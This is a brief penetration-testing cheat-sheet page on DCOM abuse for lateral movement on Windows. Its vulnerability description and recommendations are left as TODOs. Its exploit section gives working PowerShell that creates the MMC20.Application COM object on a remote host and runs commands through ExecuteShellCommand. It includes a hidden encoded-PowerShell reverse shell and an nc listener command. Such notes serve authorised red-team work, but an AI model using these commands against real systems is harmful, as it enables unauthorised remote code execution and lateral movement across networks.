DCOM Abuse

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

  • Local administrator rights on the target machine.

Exploit

From an elevated PowerShell prompt.

# Instanciate Microsoft Management Console on remote target.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","$target"))

# Execute remote command
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c $command","7")

Similar to WinRM Abuse, you can spawn a reverse shell on the target machine.

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e $payload","7")

Don’t forget to run your listener first.

nc -lnvp $lport

Recommendations

  • TODO: List recommendations here.